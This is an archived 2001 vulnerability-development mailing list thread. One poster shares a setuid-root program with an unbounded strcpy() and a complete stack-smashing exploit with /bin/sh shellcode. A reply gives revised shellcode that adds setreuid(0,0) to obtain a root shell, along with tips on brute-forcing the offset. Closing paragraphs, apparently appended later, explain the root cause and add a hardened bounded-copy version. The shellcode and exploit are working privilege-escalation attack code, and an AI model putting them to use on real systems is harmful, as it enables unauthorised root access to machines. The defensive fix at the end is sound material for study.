Vulnerability Development mailing list archives

AW: question on an exploit


From: "ConKing" <Connection_king () busch-hacker de>
Date: Mon, 21 May 2001 17:49:49 +0200

char linuxshell[] =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0"
"\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd"
"\x80\xe8\xde\xff\xff\xff/bin/sh";

I think you're using the wrong shellcode... use this one:

This shellcode only opens a normal shell with normal privileges *normal* *g*,
so there should be a setreuid(0,0); so add this shellcode:

char shell[] =
"\x31\xc9\x31\xdb\x89\xc8\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
// I added the setreuid(0,0) in the shellcode as you can see at the beginning...

Greets

ConKing

PS: To test the offset.. or to brute force it.. to get the right offset use
my offsetbruteforcer under www.usad.li/robin under MY PROGRAMS ...
Attention! ... It can be that you get a shell and only the same as
afterwards.. then use CTRL + D until you get a root shell, it should work..
the offset is about 100 more than the buffer....

-----Original Message-----
From: roland kwitt [mailto:sniper () f1lesystem net]
Sent: Thursday, 17 May 2001 16:16
To: VULN-DEV () securityfocus com
Subject: question on an exploit

hi folks,

recently I found a very good howto about buffer overflowing
and tried to code an exploit for a little program.


#####################
Prog. to be exploited
#####################

#include <string.h>     /* strcpy */

int main(int argc, char *argv[])
{
        char buffer[500];
        /* no length check: argv[1] longer than 499 bytes overruns buffer */
        if(argc>=2) strcpy(buffer, argv[1]);
        return 0;
}


As anybody can see the program does not check the size of the
input copied in buffer. Therefore it should be able to
exploit it and gain root access through spawning a root shell.

The perms of that prog are set to:

418444   16 -rwsr-xr-x   1 root     users       13335 May 17 15:22 vuln


The exploit looks like this:



#include <stdlib.h>
#include <stdio.h>
#include <string.h>     /* strlen */
#include <unistd.h>     /* execl */

#define BUFFERSIZE 600  /* vulnerable buffer + 100 bytes */

char linuxshell[] =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0"
"\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd"
"\x80\xe8\xde\xff\xff\xff/bin/sh";

/* current stack pointer (i386 only) */
unsigned long sp(void)
{
        unsigned long esp;
        __asm__("movl %%esp, %0" : "=r"(esp));
        return esp;
}

void usage(char *cmd)
{
        printf("\nusage: %s <offset>\n\n", cmd);
        exit(-1);
}

int main(int argc, char *argv[])
{
        int i, offset;
        long esp, ret, *addr_ptr;
        char *buffer, *ptr;

        if(argc<2) usage(argv[0]);

        offset = atoi(argv[1]);
        esp    = sp();
        ret    = esp-offset;

        printf("Stack pointer: 0x%lx\n", esp);
        printf("       Offset: 0x%x\n", offset);
        printf("  Return addr: 0x%lx\n", ret);

        if(!(buffer = malloc(BUFFERSIZE))) {
                printf("Couldn't allocate memory.\n");
                exit(-1);
        }

        /* fill the whole buffer with the guessed return address */
        ptr = buffer;
        addr_ptr = (long *)ptr;
        for(i=0; i<BUFFERSIZE; i+=4)
                *(addr_ptr++) = ret;

        /* first half: NOP sled */
        for(i=0; i<BUFFERSIZE/2; i++)
                buffer[i] = '\x90';

        /* shellcode centred on the middle of the buffer */
        ptr = buffer + ((BUFFERSIZE/2) - (strlen(linuxshell)/2));
        for(i=0; i<strlen(linuxshell); i++)
                *(ptr++) = linuxshell[i];

        buffer[BUFFERSIZE-1] = 0;
        execl("./vuln", "vulnerable", buffer, (char *)NULL);

        return 0;
}

As I tried to execute the exploit using "exploit 0" (offset)
the only thing I got was an ordinary user shell but not
a root shell. Can somebody tell me why the setuid flag
is ignored!!


Thanks, sniper!!
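The root cause the thread revolves around is the unbounded strcpy() into char buffer[500] in the setuid-root vuln program. As an added example (not code from either poster), here is a hardened counterpart: copy_arg() refuses any argument that does not fit, including its terminating NUL, instead of writing past the end of the buffer. The function name copy_arg and the BUFSIZE macro are my own; only the 500-byte buffer size comes from the thread.

```c
/* Hardened counterpart of the "vuln" program from the thread (added example,
 * not code from the original poster or the reply). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFSIZE 500   /* same buffer size as the program in the thread */

/* Copy src into dst (capacity dstsize). Returns 0 on success, -1 if src
 * plus its terminating NUL would not fit. On success dst is always
 * NUL-terminated; on failure dst is left untouched. The length scan is
 * bounded by dstsize, so an over-long argument costs bounded work. */
int copy_arg(char *dst, size_t dstsize, const char *src)
{
        size_t len;

        if (dst == NULL || src == NULL || dstsize == 0)
                return -1;

        for (len = 0; len < dstsize; len++)
                if (src[len] == '\0')
                        break;

        if (len == dstsize)          /* no room for the NUL: reject */
                return -1;

        memcpy(dst, src, len + 1);   /* includes the terminating NUL */
        return 0;
}

int main(int argc, char *argv[])
{
        char buffer[BUFSIZE];

        if (argc < 2) {
                fprintf(stderr, "usage: %s <arg>\n", argv[0]);
                return 1;
        }
        if (copy_arg(buffer, sizeof buffer, argv[1]) != 0) {
                fprintf(stderr, "argument too long (max %zu bytes)\n",
                        sizeof buffer - 1);
                return 1;
        }
        printf("copied %zu bytes safely\n", strlen(buffer));
        return 0;
}
```

The explicit reject-on-overflow is the point: strncpy() alone would silently truncate and, for an exactly-full buffer, leave it without a NUL terminator. For a setuid binary this kind of check matters more than the shell behaviour the reply discusses, because no return address can be overwritten if the copy never leaves the buffer; compiling with -fstack-protector and -D_FORTIFY_SOURCE=2 adds a second line of defence that aborts the process if a bounded copy is nonetheless exceeded.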






